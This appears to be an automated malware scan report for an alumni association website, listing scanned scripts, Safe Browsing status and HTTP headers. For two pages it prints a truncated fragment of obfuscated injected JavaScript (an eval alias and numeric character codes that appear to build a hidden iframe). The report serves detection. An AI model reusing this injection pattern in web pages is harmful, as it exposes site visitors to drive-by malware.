Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=nths-saxonalumni.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://nths-saxonalumni.org/ | 403 Forbidden Content-Length: 45851 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;ps="s"+"p"+"l"+"i"+"t";function asd(){++(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,171,165,152,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,171,165,152,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,162,166,154,163,157,174,160,172,175,150,165,150,150,171,173,65,165,163,66,77,140,155,112,173,15 Antivirus reports:
| ||
http://nths-saxonalumni.org/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/media/system/js/modal.js | 200 OK Content-Length: 9732 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/jak_compressed.js | 200 OK Content-Length: 45170 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/lightbox_compressed.js | 200 OK Content-Length: 38658 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/jak_slideshow.js | 200 OK Content-Length: 3511 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/window_compressed.js | 200 OK Content-Length: 3942 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/interpolator_compressed.js | 200 OK Content-Length: 5315 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/index.php/news | 200 OK Content-Length: 70666 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) r=eval;ps="s"+"p"+"l"+"i"+"t";function asd(){++(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,171,165,152,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,171,165,152,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,162,166,154,163,157,174,160,172,175,150,165,150,150,171,173,65,165,163,66,77,140,155,112,173,15 Antivirus reports:
| ||
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js | 200 OK Content-Length: 1211 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/jwplayer.js | 200 OK Content-Length: 140107 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/wmvplayer/silverlight.js | 200 OK Content-Length: 17901 Content-Type: application/javascript | clean |
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/wmvplayer/wmvplayer.js | 200 OK Content-Length: 24010 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: nths-saxonalumni.org
Result:
HTTP/1.1 403 Forbidden
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0, no-cache
Connection: close
Date: Fri, 26 Dec 2014 16:51:25 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 16:51:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df1391ec537fa4bf6137df8f9c1db891=0MEGvTFDtzwo0DdL3nLuX2; path=/
GET / HTTP/1.1
Host: nths-saxonalumni.org
Result:
HTTP/1.1 403 Forbidden
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0, no-cache
Connection: close
Date: Fri, 26 Dec 2014 16:51:25 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 16:51:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df1391ec537fa4bf6137df8f9c1db891=0MEGvTFDtzwo0DdL3nLuX2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: nths-saxonalumni.org
Referer: http://www.google.com/search?q=nths-saxonalumni.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: nths-saxonalumni.org
Referer: http://www.google.com/search?q=nths-saxonalumni.org
Result:
The result is similar to the first query. There are no suspicious redirects found.